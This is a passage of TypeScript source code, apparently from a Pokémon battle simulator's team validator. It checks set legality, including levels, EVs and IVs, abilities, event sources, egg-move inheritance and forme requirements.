if (format.forcedLevel) {
forcedLevel = format.forcedLevel;
} else if (set.level >= maxForcedLevel) {
forcedLevel = maxForcedLevel;
}
if (set.level > maxLevel || set.level === forcedLevel || set.level === maxForcedLevel) {
// Note that we're temporarily setting level 50 pokemon in VGC to level 100
// This allows e.g. level 50 Hydreigon even though it doesn't evolve until level 64.
// Leveling up can't make an obtainable pokemon unobtainable, so this is safe.
// Just remember to set the level back to forcedLevel at the end of the file.
set.level = maxLevel;
}
if ((set.level > 100 || set.level < 1) && ruleTable.isBanned('nonexistent')) {
problems.push((set.name || set.species) + ' is higher than level 100.');
}
set.name = set.name || species.baseSpecies;
let name = set.species;
if (set.species !== set.name && species.baseSpecies !== set.name) {
name = `${set.name} (${set.species})`;
}
const setHas: {[k: string]: true} = {};
const allowEVs = dex.currentMod !== 'letsgo';
const capEVs = dex.gen > 2 && (ruleTable.has('obtainablemisc') || dex.gen === 6);
if (!set.evs) set.evs = TeamValidator.fillStats(null, allowEVs && !capEVs ? 252 : 0);
if (!set.ivs) set.ivs = TeamValidator.fillStats(null, 31);
if (ruleTable.has('obtainableformes')) {
problems.push(...this.validateForme(set));
species = dex.getSpecies(set.species);
}
const setSources = this.allSources(species);
for (const [rule] of ruleTable) {
if ('!+-'.includes(rule.charAt(0))) continue;
const subformat = dex.getFormat(rule);
if (subformat.onChangeSet && ruleTable.has(subformat.id)) {
problems = problems.concat(subformat.onChangeSet.call(this, set, format, setHas, teamHas) || []);
}
}
if (format.onChangeSet) {
problems = problems.concat(format.onChangeSet.call(this, set, format, setHas, teamHas) || []);
}
// onChangeSet can modify set.species, set.item, set.ability
species = dex.getSpecies(set.species);
item = dex.getItem(set.item);
ability = dex.getAbility(set.ability);
let outOfBattleSpecies = species;
let tierSpecies = species;
if (ability.id === 'battlebond' && species.id === 'greninja') {
outOfBattleSpecies = dex.getSpecies('greninjaash');
if (ruleTable.has('obtainableformes')) {
tierSpecies = outOfBattleSpecies;
}
if (ruleTable.has('obtainablemisc')) {
if (set.gender && set.gender !== 'M') {
problems.push(`Battle Bond Greninja must be male.`);
}
set.gender = 'M';
}
}
if (ability.id === 'owntempo' && species.id === 'rockruff') {
tierSpecies = outOfBattleSpecies = dex.getSpecies('rockruffdusk');
}
if (species.id === 'melmetal' && set.gigantamax && this.dex.getLearnsetData(species.id).eventData) {
setSources.sourcesBefore = 0;
setSources.sources = ['8S0 melmetal'];
}
if (!species.exists) {
return [`The Pokemon "${set.species}" does not exist.`];
}
if (item.id && !item.exists) {
return [`"${set.item}" is an invalid item.`];
}
if (ability.id && !ability.exists) {
if (dex.gen < 3) {
// gen 1-2 don't have abilities, just silently remove
ability = dex.getAbility('');
set.ability = '';
} else {
return [`"${set.ability}" is an invalid ability.`];
}
}
if (nature.id && !nature.exists) {
if (dex.gen < 3) {
// gen 1-2 don't have natures, just remove them
nature = dex.getNature('');
set.nature = '';
} else {
problems.push(`"${set.nature}" is an invalid nature.`);
}
}
if (set.happiness !== undefined && isNaN(set.happiness)) {
problems.push(`${name} has an invalid happiness value.`);
}
if (set.hpType) {
const type = dex.getType(set.hpType);
if (!type.exists || ['normal', 'fairy'].includes(type.id)) {
problems.push(`${name}'s Hidden Power type (${set.hpType}) is invalid.`);
} else {
set.hpType = type.name;
}
}
if (ruleTable.has('obtainableformes')) {
const canMegaEvo = dex.gen <= 7 || ruleTable.has('standardnatdex');
if (item.megaEvolves === species.name) {
if (!item.megaStone) throw new Error(`Item ${item.name} has no base form for mega evolution`);
tierSpecies = dex.getSpecies(item.megaStone);
} else if (item.id === 'redorb' && species.id === 'groudon') {
tierSpecies = dex.getSpecies('Groudon-Primal');
} else if (item.id === 'blueorb' && species.id === 'kyogre') {
tierSpecies = dex.getSpecies('Kyogre-Primal');
} else if (item.id === 'adamantorb' && species.id === 'dialga') {
tierSpecies = dex.getSpecies('Dialga-Primal');
} else if (canMegaEvo && species.id === 'rayquaza' && set.moves.map(toID).includes('dragonascent' as ID)) {
tierSpecies = dex.getSpecies('Rayquaza-Mega');
}
}
let problem = this.checkSpecies(set, species, tierSpecies, setHas);
if (problem) problems.push(problem);
problem = this.checkItem(set, item, setHas);
if (problem) problems.push(problem);
if (ruleTable.has('obtainablemisc')) {
if (dex.gen <= 1 || ruleTable.has('allowavs')) {
if (item.id) {
// no items allowed
set.item = '';
}
}
}
if (!set.ability) set.ability = 'No Ability';
if (ruleTable.has('obtainableabilities')) {
if (dex.gen <= 2 || dex.currentMod === 'letsgo') {
set.ability = 'No Ability';
} else {
if (!ability.name || ability.name === 'No Ability') {
problems.push(`${name} needs to have an ability.`);
} else if (!Object.values(species.abilities).includes(ability.name)) {
if (tierSpecies.abilities[0] === ability.name) {
set.ability = species.abilities[0];
} else {
problems.push(`${name} can't have ${set.ability}.`);
}
}
if (ability.name === species.abilities['H']) {
setSources.isHidden = true;
let unreleasedHidden = species.unreleasedHidden;
if (unreleasedHidden === 'Past' && this.minSourceGen < dex.gen) unreleasedHidden = false;
if (unreleasedHidden && ruleTable.has('-unreleased')) {
problems.push(`${name}'s Hidden Ability is unreleased.`);
} else if (dex.gen === 7 && ['entei', 'suicune', 'raikou'].includes(species.id) && this.minSourceGen > 1) {
problems.push(`${name}'s Hidden Ability is only available from Virtual Console, which is not allowed in this format.`);
} else if (dex.gen === 6 && ability.name === 'Symbiosis' &&
(set.species.endsWith('Orange') || set.species.endsWith('White'))) {
problems.push(`${name}'s Hidden Ability is unreleased for the Orange and White forms.`);
} else if (dex.gen === 5 && set.level < 10 && (species.maleOnlyHidden || species.gender === 'N')) {
problems.push(`${name} must be at least level 10 to have a Hidden Ability.`);
}
if (species.maleOnlyHidden) {
if (set.gender && set.gender !== 'M') {
problems.push(`${name} must be male to have a Hidden Ability.`);
}
set.gender = 'M';
setSources.sources = ['5D'];
}
} else {
setSources.isHidden = false;
}
}
}
ability = dex.getAbility(set.ability);
problem = this.checkAbility(set, ability, setHas);
if (problem) problems.push(problem);
if (!set.nature || dex.gen <= 2) {
set.nature = '';
}
nature = dex.getNature(set.nature);
problem = this.checkNature(set, nature, setHas);
if (problem) problems.push(problem);
if (set.moves && Array.isArray(set.moves)) {
set.moves = set.moves.filter(val => val);
}
if (!set.moves?.length) {
problems.push(`${name} has no moves.`);
set.moves = [];
}
// A limit is imposed here to prevent too much engine strain or
// too much layout deformation - to be exact, this is the limit
// allowed in Custom Game.
if (set.moves.length > 24) {
problems.push(`${name} has more than 24 moves, which the simulator can't handle.`);
return problems;
}
if (ruleTable.isBanned('nonexistent') && set.moves.length > 4) {
problems.push(`${name} has more than 4 moves.`);
return problems;
}
if (ruleTable.isBanned('nonexistent')) {
problems.push(...this.validateStats(set, species, setSources));
}
for (const moveName of set.moves) {
if (!moveName) continue;
const move = dex.getMove(Utils.getString(moveName));
if (!move.exists) return [`"${move.name}" is an invalid move.`];
problem = this.checkMove(set, move, setHas);
if (problem) problems.push(problem);
}
if (ruleTable.has('obtainablemoves')) {
problems.push(...this.validateMoves(outOfBattleSpecies, set.moves, setSources, set, name));
}
const learnsetSpecies = dex.getLearnsetData(outOfBattleSpecies.id);
if (!setSources.sourcesBefore && setSources.sources.length) {
let legal = false;
for (const source of setSources.sources) {
if (this.validateSource(set, source, setSources, outOfBattleSpecies)) continue;
legal = true;
break;
}
if (!legal) {
let nonEggSource = null;
for (const source of setSources.sources) {
if (source.charAt(1) !== 'E') {
nonEggSource = source;
break;
}
}
if (!nonEggSource) {
// all egg moves
problems.push(`${name} can't get its egg move combination (${setSources.limitedEggMoves!.join(', ')}) from any possible father.`);
problems.push(`(Is this incorrect? If so, post the chainbreeding instructions in Bug Reports)`);
} else {
if (setSources.sources.length > 1) {
problems.push(`${name} has an event-exclusive move that it doesn't qualify for (only one of several ways to get the move will be listed):`);
}
const eventProblems = this.validateSource(
set, nonEggSource, setSources, outOfBattleSpecies, ` because it has a move only available`
);
if (eventProblems) problems.push(...eventProblems);
}
}
} else if (ruleTable.has('obtainablemisc') && learnsetSpecies.eventOnly) {
const eventSpecies = !learnsetSpecies.eventData &&
outOfBattleSpecies.baseSpecies !== outOfBattleSpecies.name ?
dex.getSpecies(outOfBattleSpecies.baseSpecies) : outOfBattleSpecies;
const eventData = learnsetSpecies.eventData ||
dex.getLearnsetData(eventSpecies.id).eventData;
if (!eventData) throw new Error(`Event-only species ${species.name} has no eventData table`);
let legal = false;
for (const event of eventData) {
if (this.validateEvent(set, event, eventSpecies)) continue;
legal = true;
break;
}
if (!legal && species.gen <= 2 && dex.gen >= 7 && !this.validateSource(set, '7V', setSources, species)) {
legal = true;
}
if (!legal) {
if (eventData.length === 1) {
problems.push(`${species.name} is only obtainable from an event - it needs to match its event:`);
} else {
problems.push(`${species.name} is only obtainable from events - it needs to match one of its events, such as:`);
}
let eventInfo = eventData[0];
let eventNum = 1;
for (const [i, event] of eventData.entries()) {
if (event.generation <= dex.gen && event.generation >= this.minSourceGen) {
eventInfo = event;
eventNum = i + 1;
break;
}
}
const eventName = eventData.length > 1 ? ` #${eventNum}` : ``;
const eventProblems = this.validateEvent(set, eventInfo, eventSpecies, ` to be`, `from its event${eventName}`);
if (eventProblems) problems.push(...eventProblems);
}
}
if (ruleTable.has('obtainablemisc') && set.level < (species.evoLevel || 0)) {
// FIXME: Event pokemon given at a level under what it normally can be attained at gives a false positive
problems.push(`${name} must be at least level ${species.evoLevel} to be evolved.`);
}
if (ruleTable.has('obtainablemoves') && species.id === 'keldeo' && set.moves.includes('secretsword') &&
this.minSourceGen > 5 && dex.gen <= 7) {
problems.push(`${name} has Secret Sword, which is only compatible with Keldeo-Ordinary obtained from Gen 5.`);
}
const requiresGen3Source = setSources.maxSourceGen() <= 3;
if (requiresGen3Source && dex.getAbility(set.ability).gen === 4 && !species.prevo && dex.gen <= 5) {
// Ability Capsule allows this in Gen 6+
problems.push(`${name} has a Gen 4 ability and isn't evolved - it can't use moves from Gen 3.`);
}
const canUseAbilityPatch = dex.gen >= 8 && format.mod !== 'gen8dlc1';
if (setSources.isHidden && !canUseAbilityPatch && setSources.maxSourceGen() < 5) {
problems.push(`${name} has a Hidden Ability - it can't use moves from before Gen 5.`);
}
if (
species.maleOnlyHidden && setSources.isHidden && setSources.sourcesBefore < 5 &&
setSources.sources.every(source => source.charAt(1) === 'E')
) {
problems.push(`${name} has an unbreedable Hidden Ability - it can't use egg moves.`);
}
if (teamHas) {
for (const i in setHas) {
if (i in teamHas) {
teamHas[i]++;
} else {
teamHas[i] = 1;
}
}
}
for (const [rule, source, limit, bans] of ruleTable.complexBans) {
let count = 0;
for (const ban of bans) {
if (setHas[ban]) count++;
}
if (limit && count > limit) {
const clause = source ? ` by ${source}` : ``;
problems.push(`${name} is limited to ${limit} of ${rule}${clause}.`);
} else if (!limit && count >= bans.length) {
const clause = source ? ` by ${source}` : ``;
if (source === 'Obtainable Moves') {
problems.push(`${name} has the combination of ${rule}, which is impossible to obtain legitimately.`);
} else {
problems.push(`${name} has the combination of ${rule}, which is banned${clause}.`);
}
}
}
for (const [rule] of ruleTable) {
if ('!+-'.includes(rule.charAt(0))) continue;
const subformat = dex.getFormat(rule);
if (subformat.onValidateSet && ruleTable.has(subformat.id)) {
problems = problems.concat(subformat.onValidateSet.call(this, set, format, setHas, teamHas) || []);
}
}
if (format.onValidateSet) {
problems = problems.concat(format.onValidateSet.call(this, set, format, setHas, teamHas) || []);
}
const nameSpecies = dex.getSpecies(set.name);
if (nameSpecies.exists && nameSpecies.name.toLowerCase() === set.name.toLowerCase()) {
// nickname is the name of a species
if (nameSpecies.baseSpecies === species.baseSpecies) {
set.name = species.baseSpecies;
} else if (nameSpecies.name !== species.name && nameSpecies.name !== species.baseSpecies) {
// nickname species doesn't match actual species
// Nickname Clause
problems.push(`${name} must not be nicknamed a different Pokémon species than what it actually is.`);
}
}
if (!problems.length) {
if (forcedLevel) set.level = forcedLevel;
return null;
}
return problems;
}
validateStats(set: PokemonSet, species: Species, setSources: PokemonSources) {
const ruleTable = this.ruleTable;
const dex = this.dex;
const allowEVs = dex.currentMod !== 'letsgo';
const allowAVs = ruleTable.has('allowavs');
const capEVs = dex.gen > 2 && (ruleTable.has('obtainablemisc') || dex.gen === 6);
const canBottleCap = dex.gen >= 7 && (set.level === 100 || !ruleTable.has('obtainablemisc'));
if (!set.evs) set.evs = TeamValidator.fillStats(null, allowEVs && !capEVs ? 252 : 0);
if (!set.ivs) set.ivs = TeamValidator.fillStats(null, 31);
const problems = [];
const name = set.name || set.species;
const statTable = {
hp: 'HP', atk: 'Attack', def: 'Defense', spa: 'Special Attack', spd: 'Special Defense', spe: 'Speed',
};
const maxedIVs = Object.values(set.ivs).every(stat => stat === 31);
for (const moveName of set.moves) {
const move = dex.getMove(moveName);
if (move.id === 'hiddenpower' && move.type !== 'Normal') {
if (!set.hpType) {
set.hpType = move.type;
} else if (set.hpType !== move.type && ruleTable.has('obtainablemisc')) {
problems.push(`${name}'s Hidden Power type ${set.hpType} is incompatible with Hidden Power ${move.type}`);
}
}
}
if (set.hpType && maxedIVs && ruleTable.has('obtainablemisc')) {
if (dex.gen <= 2) {
const HPdvs = dex.getType(set.hpType).HPdvs;
set.ivs = {hp: 30, atk: 30, def: 30, spa: 30, spd: 30, spe: 30};
let statName: StatName;
for (statName in HPdvs) {
set.ivs[statName] = HPdvs[statName]! * 2;
}
set.ivs.hp = -1;
} else if (!canBottleCap) {
set.ivs = TeamValidator.fillStats(dex.getType(set.hpType).HPivs, 31);
}
}
const cantBreedNorEvolve = (species.eggGroups[0] === 'Undiscovered' && !species.prevo && !species.nfe);
const isLegendary = (cantBreedNorEvolve && ![
'Pikachu', 'Unown', 'Dracozolt', 'Arctozolt', 'Dracovish', 'Arctovish',
].includes(species.baseSpecies)) || [
'Manaphy', 'Cosmog', 'Cosmoem', 'Solgaleo', 'Lunala',
].includes(species.baseSpecies);
const diancieException = species.name === 'Diancie' && !set.shiny;
const has3PerfectIVs = setSources.minSourceGen() >= 6 && isLegendary && !diancieException;
if (has3PerfectIVs) {
let perfectIVs = 0;
for (const stat in set.ivs) {
if (set.ivs[stat as 'hp'] >= 31) perfectIVs++;
}
if (perfectIVs < 3) {
const reason = (this.minSourceGen === 6 ? ` and this format requires gen ${dex.gen} Pokémon` : ` in gen 6 or later`);
problems.push(`${name} must have at least three perfect IVs because it's a legendary${reason}.`);
}
}
if (set.hpType && !canBottleCap) {
const ivHpType = dex.getHiddenPower(set.ivs).type;
if (set.hpType !== ivHpType) {
problems.push(`${name} has Hidden Power ${set.hpType}, but its IVs are for Hidden Power ${ivHpType}.`);
}
} else if (set.hpType) {
if (!this.possibleBottleCapHpType(set.hpType, set.ivs)) {
problems.push(`${name} has Hidden Power ${set.hpType}, but its IVs don't allow this even with (Bottle Cap) Hyper Training.`);
}
}
if (dex.gen <= 2) {
// validate DVs
const ivs = set.ivs;
const atkDV = Math.floor(ivs.atk / 2);
const defDV = Math.floor(ivs.def / 2);
const speDV = Math.floor(ivs.spe / 2);
const spcDV = Math.floor(ivs.spa / 2);
const expectedHpDV = (atkDV % 2) * 8 + (defDV % 2) * 4 + (speDV % 2) * 2 + (spcDV % 2);
if (ivs.hp === -1) ivs.hp = expectedHpDV * 2;
const hpDV = Math.floor(ivs.hp / 2);
if (expectedHpDV !== hpDV) {
problems.push(`${name} has an HP DV of ${hpDV}, but its Atk, Def, Spe, and Spc DVs give it an HP DV of ${expectedHpDV}.`);
}
if (ivs.spa !== ivs.spd) {
if (dex.gen === 2) {
problems.push(`${name} has different SpA and SpD DVs, which is not possible in Gen 2.`);
} else {
ivs.spd = ivs.spa;
}
}
if (dex.gen > 1 && !species.gender) {
// Gen 2 gender is calculated from the Atk DV.
// High Atk DV <-> M. The meaning of "high" depends on the gender ratio.
const genderThreshold = species.genderRatio.F * 16;
const expectedGender = (atkDV >= genderThreshold ? 'M' : 'F');
if (set.gender && set.gender !== expectedGender) {
problems.push(`${name} is ${set.gender}, but it has an Atk DV of ${atkDV}, which makes its gender ${expectedGender}.`);
} else {
set.gender = expectedGender;
}
}
if (
set.species === 'Marowak' && toID(set.item) === 'thickclub' &&
set.moves.map(toID).includes('swordsdance' as ID) && set.level === 100
) {
// Marowak hack
set.ivs.atk = Math.floor(set.ivs.atk / 2) * 2;
while (set.evs.atk > 0 && 2 * 80 + set.ivs.atk + Math.floor(set.evs.atk / 4) + 5 > 255) {
set.evs.atk -= 4;
}
}
if (dex.gen > 1) {
const expectedShiny = !!(defDV === 10 && speDV === 10 && spcDV === 10 && atkDV % 4 >= 2);
if (expectedShiny && !set.shiny) {
problems.push(`${name} is not shiny, which does not match its DVs.`);
} else if (!expectedShiny && set.shiny) {
problems.push(`${name} is shiny, which does not match its DVs (its DVs must all be 10, except Atk which must be 2, 3, 6, 7, 10, 11, 14, or 15).`);
}
}
set.nature = 'Serious';
}
for (const stat in set.evs) {
if (set.evs[stat as 'hp'] < 0) {
problems.push(`${name} has less than 0 ${allowAVs ? 'Awakening Values' : 'EVs'} in ${statTable[stat as 'hp']}.`);
}
}
if (dex.currentMod === 'letsgo') { // AVs
for (const stat in set.evs) {
if (set.evs[stat as 'hp'] > 0 && !allowAVs) {
problems.push(`${name} has Awakening Values but this format doesn't allow them.`);
break;
} else if (set.evs[stat as 'hp'] > 200) {
problems.push(`${name} has more than 200 Awakening Values in ${statTable[stat as 'hp']}.`);
}
}
} else { // EVs
for (const stat in set.evs) {
if (set.evs[stat as StatName] > 255) {
problems.push(`${name} has more than 255 EVs in ${statTable[stat as 'hp']}.`);
}
}
if (dex.gen <= 2) {
if (set.evs.spa !== set.evs.spd) {
if (dex.gen === 2) {
problems.push(`${name} has different SpA and SpD EVs, which is not possible in Gen 2.`);
} else {
set.evs.spd = set.evs.spa;
}
}
}
}
let totalEV = 0;
for (const stat in set.evs) totalEV += set.evs[stat as 'hp'];
if (!this.format.debug) {
if (set.level > 1 && (allowEVs || allowAVs) && totalEV === 0) {
problems.push(`${name} has exactly 0 EVs - did you forget to EV it? (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
} else if (allowEVs && !capEVs && [508, 510].includes(totalEV)) {
problems.push(`${name} has exactly 510 EVs, but this format does not restrict you to 510 EVs: you can max out every EV (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
}
// Check for level import errors from user in VGC -> DOU, etc.
// Note that in VGC etc (maxForcedLevel: 50), `set.level` will be 100 here for validation purposes
if (set.level === 50 && this.format.maxLevel !== 50 && allowEVs && totalEV % 4 === 0) {
problems.push(`${name} is level 50, but this format allows level 100 Pokémon. (If this was intentional, add exactly 1 to one of your EVs, which won't change its stats but will tell us that it wasn't a mistake).`);
}
}
if (allowEVs && capEVs && totalEV > 510) {
problems.push(`${name} has more than 510 total EVs.`);
}
return problems;
}
/**
* Not exhaustive, just checks Atk and Spe, which are the only competitively
* relevant IVs outside of extremely obscure situations.
*/
possibleBottleCapHpType(type: string, ivs: StatsTable) {
if (!type) return true;
if (['Dark', 'Dragon', 'Grass', 'Ghost', 'Poison'].includes(type)) {
// Spe must be odd
if (ivs.spe % 2 === 0) return false;
}
if (['Psychic', 'Fire', 'Rock', 'Fighting'].includes(type)) {
// Spe must be even
if (ivs.spe !== 31 && ivs.spe % 2 === 1) return false;
}
if (type === 'Dark') {
// Atk must be odd
if (ivs.atk % 2 === 0) return false;
}
if (['Ice', 'Water'].includes(type)) {
// Spe or Atk must be odd
if (ivs.spe % 2 === 0 && ivs.atk % 2 === 0) return false;
}
return true;
}
validateSource(
set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species, because: string
): string[] | undefined;
validateSource(
set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species
): true | undefined;
/**
* Returns array of error messages if invalid, undefined if valid
*
* If `because` is not passed, instead returns true if invalid.
*/
validateSource(
set: PokemonSet, source: PokemonSource, setSources: PokemonSources, species: Species, because?: string
) {
let eventData: EventInfo | undefined;
let eventSpecies = species;
if (source.charAt(1) === 'S') {
const splitSource = source.substr(source.charAt(2) === 'T' ? 3 : 2).split(' ');
const dex = (this.dex.gen === 1 ? this.dex.mod('gen2') : this.dex);
eventSpecies = dex.getSpecies(splitSource[1]);
const eventLsetData = this.dex.getLearnsetData(eventSpecies.id);
eventData = eventLsetData.eventData?.[parseInt(splitSource[0])];
if (!eventData) {
throw new Error(`${eventSpecies.name} from ${species.name} doesn't have data for event ${source}`);
}
} else if (source === '7V') {
const isMew = species.id === 'mew';
const isCelebi = species.id === 'celebi';
eventData = {
generation: 2,
level: isMew ? 5 : isCelebi ? 30 : undefined,
perfectIVs: isMew || isCelebi ? 5 : 3,
isHidden: !!this.dex.mod('gen7').getSpecies(species.id).abilities['H'],
shiny: isMew ? undefined : 1,
pokeball: 'pokeball',
from: 'Gen 1-2 Virtual Console transfer',
};
} else if (source === '8V') {
const isMew = species.id === 'mew';
eventData = {
generation: 8,
perfectIVs: isMew ? 3 : undefined,
shiny: isMew ? undefined : 1,
from: 'Gen 7 Let\'s Go! HOME transfer',
};
} else if (source.charAt(1) === 'D') {
eventData = {
generation: 5,
level: 10,
from: 'Gen 5 Dream World',
isHidden: !!this.dex.mod('gen5').getSpecies(species.id).abilities['H'],
};
} else if (source.charAt(1) === 'E') {
if (this.findEggMoveFathers(source, species, setSources)) {
return undefined;
}
if (because) throw new Error(`Wrong place to get an egg incompatibility message`);
return true;
} else {
throw new Error(`Unidentified source ${source} passed to validateSource`);
}
// complicated fancy return signature
return this.validateEvent(set, eventData, eventSpecies, because as any) as any;
}
findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources): boolean;
findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources, getAll: true): ID[] | null;
findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources, getAll = false) {
// tradebacks have an eggGen of 2 even though the source is 1ET
const eggGen = Math.max(parseInt(source.charAt(0)), 2);
const fathers: ID[] = [];
// Gen 6+ don't have egg move incompatibilities
// (except for certain cases with baby Pokemon not handled here)
if (!getAll && eggGen >= 6) return true;
const eggMoves = setSources.limitedEggMoves;
// must have 2 or more egg moves to have egg move incompatibilities
if (!eggMoves) {
// happens often in gen 1-6 LC if your only egg moves are level-up moves,
// which aren't limited and so aren't in `limitedEggMoves`
return getAll ? ['*'] : true;
}
if (!getAll && eggMoves.length <= 1) return true;
// gen 1 eggs come from gen 2 breeding
const dex = this.dex.gen === 1 ? this.dex.mod('gen2') : this.dex;
// In Gen 5 and earlier, egg moves can only be inherited from the father
// we'll test each possible father separately
let eggGroups = species.eggGroups;
if (species.id === 'nidoqueen' || species.id === 'nidorina') {
eggGroups = dex.getSpecies('nidoranf').eggGroups;
} else if (dex !== this.dex) {
// Gen 1 tradeback; grab the egg groups from Gen 2
eggGroups = dex.getSpecies(species.id).eggGroups;
}
if (eggGroups[0] === 'Undiscovered') eggGroups = dex.getSpecies(species.evos[0]).eggGroups;
if (eggGroups[0] === 'Undiscovered' || !eggGroups.length) {
throw new Error(`${species.name} has no egg groups for source ${source}`);
}
// no chainbreeding necessary if the father can be Smeargle
if (!getAll && eggGroups.includes('Field')) return true;
// try to find a father to inherit the egg move combination from
for (const fatherid in dex.data.Pokedex) {
const father = dex.getSpecies(fatherid);
const fatherLsetData = dex.getLearnsetData(fatherid as ID);
// can't inherit from CAP pokemon
if (father.isNonstandard) continue;
// can't breed mons from future gens
if (father.gen > eggGen) continue;
// father must be male
if (father.gender === 'N' || father.gender === 'F') continue;
// can't inherit from dex entries with no learnsets
if (!fatherLsetData.exists || !fatherLsetData.learnset) continue;
// something is clearly wrong if its only possible father is itself
// (exceptions: ExtremeSpeed Dragonite, Self-destruct Snorlax)
if (species.id === fatherid && !['dragonite', 'snorlax'].includes(fatherid)) continue;
// don't check NFE Pokémon - their evolutions will know all their moves and more
// exception: Combee/Salandit, because their evos can't be fathers
if (father.evos.length) {
const evolvedFather = dex.getSpecies(father.evos[0]);
if (evolvedFather.gen <= eggGen && evolvedFather.gender !== 'F') continue;
}
// must be able to breed with father
if (!father.eggGroups.some(eggGroup => eggGroups.includes(eggGroup))) continue;
// father must be able to learn the move
if (!this.fatherCanLearn(father, eggMoves, eggGen)) continue;
// father found!
if (!getAll) return true;
fathers.push(fatherid as ID);
}
if (!getAll) return false;
return (!fathers.length && eggGen < 6) ? null : fathers;
}
/**
* We could, if we wanted, do a complete move validation of the father's
* moveset to see if it's valid. This would recurse and be NP-Hard so
* instead we won't. We'll instead use a simplified algorithm: The father
* can learn the moveset if it has at most one egg/event move.
*
* `eggGen` should be 5 or earlier. Later gens should never call this
* function (the answer is always yes).
*/
fatherCanLearn(species: Species, moves: ID[], eggGen: number) {
let lsetData = this.dex.getLearnsetData(species.id);
if (!lsetData.learnset) return false;
if (species.id === 'smeargle') return true;
const canBreedWithSmeargle = species.eggGroups.includes('Field');
let eggMoveCount = 0;
for (const move of moves) {
let curSpecies: Species | null = species;
/** 1 = can learn from egg, 2 = can learn unrestricted */
let canLearn: 0 | 1 | 2 = 0;
while (curSpecies) {
lsetData = this.dex.getLearnsetData(curSpecies.id);
if (lsetData.learnset && lsetData.learnset[move]) {
for (const moveSource of lsetData.learnset[move]) {
if (parseInt(moveSource.charAt(0)) > eggGen) continue;
const canLearnFromSmeargle = moveSource.charAt(1) === 'E' && canBreedWithSmeargle;
if (!'ESDV'.includes(moveSource.charAt(1)) || canLearnFromSmeargle) {
canLearn = 2;
break;
} else {
canLearn = 1;
}
}
}
if (canLearn === 2) break;
curSpecies = this.learnsetParent(curSpecies);
}
if (!canLearn) return false;
if (canLearn === 1) {
eggMoveCount++;
if (eggMoveCount > 1) return false;
}
}
return true;
}
validateForme(set: PokemonSet) {
const dex = this.dex;
const name = set.name || set.species;
const problems = [];
const item = dex.getItem(set.item);
const species = dex.getSpecies(set.species);
if (species.name === 'Necrozma-Ultra') {
const whichMoves = (set.moves.includes('sunsteelstrike') ? 1 : 0) +
(set.moves.includes('moongeistbeam') ? 2 : 0);
if (item.name !== 'Ultranecrozium Z') {
// Necrozma-Ultra transforms from one of two formes, and neither one is the base forme
problems.push(`Necrozma-Ultra must start the battle holding Ultranecrozium Z.`);
} else if (whichMoves === 1) {
set.species = 'Necrozma-Dusk-Mane';
} else if (whichMoves === 2) {
set.species = 'Necrozma-Dawn-Wings';
} else {
problems.push(`Necrozma-Ultra must start the battle as Necrozma-Dusk-Mane or Necrozma-Dawn-Wings holding Ultranecrozium Z. Please specify which Necrozma it should start as.`);
}
} else if (species.name === 'Zygarde-Complete') {
problems.push(`Zygarde-Complete must start the battle as Zygarde or Zygarde-10% with Power Construct. Please specify which Zygarde it should start as.`);
} else if (species.battleOnly) {
if (species.requiredAbility && set.ability !== species.requiredAbility) {
// Darmanitan-Zen
problems.push(`${species.name} transforms in-battle with ${species.requiredAbility}, please fix its ability.`);
}
if (species.requiredItems) {
if (!species.requiredItems.includes(item.name)) {
// Mega or Primal
problems.push(`${species.name} transforms in-battle with ${species.requiredItem}, please fix its item.`);
}
}
if (species.requiredMove && !set.moves.includes(toID(species.requiredMove))) {
// Meloetta-Pirouette, Rayquaza-Mega
problems.push(`${species.name} transforms in-battle with ${species.requiredMove}, please fix its moves.`);
}
if (typeof species.battleOnly !== 'string') {
// Ultra Necrozma and Complete Zygarde are already checked above
throw new Error(`${species.name} should have a string battleOnly`);
}
// Set to out-of-battle forme
set.species = species.battleOnly;
} else {
if (species.requiredAbility) {
// Impossible!
throw new Error(`Species ${species.name} has a required ability despite not being a battle-only forme; it should just be in its abilities table.`);
}
if (species.requiredItems && !species.requiredItems.includes(item.name)) {
if (dex.gen >= 8 && (species.baseSpecies === 'Arceus' || species.baseSpecies === 'Silvally')) {
// Arceus/Silvally formes in gen 8 only require the item with Multitype/RKS System
if (set.ability === species.abilities[0]) {
problems.push(
`${name} needs to hold ${species.requiredItems.join(' or ')}.`,
`(It will revert to its Normal forme if you remove the item or give it a different item.)`
);
}
} else {
// Memory/Drive/Griseous Orb/Plate/Z-Crystal - Forme mismatch
const baseSpecies = this.dex.getSpecies(species.changesFrom);
problems.push(
`${name} needs to hold ${species.requiredItems.join(' or ')} to be in its ${species.forme} forme.`,
`(It will revert to its ${baseSpecies.baseForme || 'base'} forme if you remove the item or give it a different item.)`
);
}
}
if (species.requiredMove && !set.moves.includes(toID(species.requiredMove))) {
const baseSpecies = this.dex.getSpecies(species.changesFrom);
problems.push(
`${name} needs to know the move ${species.requiredMove} to be in its ${species.forme} forme.`,
`(It will revert to its ${baseSpecies.baseForme} forme if it forgets the move.)`
);
}
// Mismatches between the set forme (if not base) and the item signature forme will have been rejected already.
// It only remains to assign the right forme to a set with the base species (Arceus/Genesect/Giratina/Silvally).
if (item.forcedForme && species.name === dex.getSpecies(item.forcedForme).baseSpecies) {
set.species = item.forcedForme;
}
}
if (species.name === 'Pikachu-Cosplay') {
const cosplay: {[k: string]: string} = {
meteormash: 'Pikachu-Rock-Star', iciclecrash: 'Pikachu-Belle', drainingkiss: 'Pikachu-Pop-Star',
electricterrain: 'Pikachu-PhD', flyingpress: 'Pikachu-Libre',
};
for (const moveid of set.moves) {
if (moveid in cosplay) {
set.species = cosplay[moveid];
break;
}
}
}
if (species.name === 'Keldeo' && set.moves.includes('secretsword') && dex.gen >= 8) {
set.species = 'Keldeo-Resolute';
}
const crowned: {[k: string]: string} = {
'Zacian-Crowned': 'behemothblade', 'Zamazenta-Crowned': 'behemothbash',
};
if (set.species in crowned) {
const ironHead = set.moves.indexOf('ironhead');
if (ironHead >= 0) {
set.moves[ironHead] = crowned[set.species];
}
}
return problems;
}
checkSpecies(set: PokemonSet, species: Species, tierSpecies: Species, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
